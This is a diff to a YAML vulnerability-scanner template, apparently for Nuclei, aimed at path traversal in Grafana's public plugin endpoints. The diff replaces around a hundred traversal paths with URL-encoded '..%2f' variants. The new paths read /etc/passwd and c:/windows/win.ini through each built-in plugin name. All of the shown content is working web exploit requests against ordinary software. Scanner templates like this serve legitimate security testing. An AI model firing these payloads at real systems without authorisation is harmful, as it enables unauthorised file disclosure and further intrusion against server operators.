--- a/0day-grafana.yaml
+++ b/0day-grafana.yaml
@@ -15,105 +15,105 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/public/plugins/alertGroups/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/icon/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/alertmanager/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/annolist/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/barchart/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/bargauge/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/canvas/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/cloudwatch/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/dashboard/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/dashlist/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/debug/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/elasticsearch/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/gauge/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/geomap/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/gettingstarted/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/grafana/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/graph/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/graphite/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/heatmap/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/histogram/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/influxdb/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/jaeger/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/live/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/logs/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/loki/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/mixed/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/mssql/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/mysql/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/news/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/nodeGraph/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/opentsdb/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/piechart/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/pluginlist/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/postgres/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/prometheus/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/stat/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/state-timeline/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/status-history/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/table-old/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/table/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/tempo/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/testdata/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/text/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/timeseries/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/welcome/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/xychart/../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/public/plugins/alertGroups/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/icon/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/alertmanager/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/annolist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/barchart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/bargauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/canvas/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/cloudwatch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/dashboard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/dashlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/debug/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/elasticsearch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/gauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/geomap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/gettingstarted/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/grafana/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/graph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/graphite/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/heatmap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/histogram/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/influxdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/jaeger/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/live/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/loki/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/mixed/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/mssql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/news/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/nodeGraph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/opentsdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/piechart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/pluginlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/postgres/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/prometheus/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/stat/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/state-timeline/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/status-history/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/table-old/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/table/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/tempo/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/testdata/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/timeseries/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/xychart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/public/plugins/zipkin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
       - "{{BaseURL}}/public/plugins/grafana-clock-panel/../../../../../../etc/passwd"
-      - "{{BaseURL}}/public/plugins/alertGroups/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/icon/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/alertmanager/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/annolist/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/barchart/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/bargauge/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/canvas/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/cloudwatch/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/dashboard/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/dashlist/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/debug/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/elasticsearch/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/gauge/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/geomap/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/gettingstarted/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/grafana/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/graph/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/graphite/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/heatmap/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/histogram/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/influxdb/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/jaeger/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/live/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/logs/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/loki/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/mixed/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/mssql/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/mysql/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/news/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/nodeGraph/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/opentsdb/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/piechart/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/pluginlist/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/postgres/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/prometheus/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/stat/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/state-timeline/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/status-history/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/table-old/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/table/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/tempo/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/testdata/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/text/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/timeseries/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/welcome/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/xychart/../../../../../../../../c:/windows/win.ini"
-      - "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertGroups/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/icon/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertmanager/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/annolist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/barchart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/bargauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/canvas/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/cloudwatch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/dashboard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/dashlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/debug/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/elasticsearch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/gauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/geomap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/gettingstarted/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/grafana/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/graph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/graphite/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/heatmap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/histogram/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/influxdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/jaeger/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/live/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/loki/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mixed/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mssql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/news/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/nodeGraph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/opentsdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/piechart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/pluginlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/postgres/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/prometheus/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/stat/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/state-timeline/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/status-history/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/table-old/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/table/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/tempo/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/testdata/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/timeseries/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/xychart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/zipkin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini"
       - "{{BaseURL}}/public/plugins/grafana-clock-panel/../../../../../../c:/windows/win.ini"
     stop-at-first-match: true
     matchers-condition: and
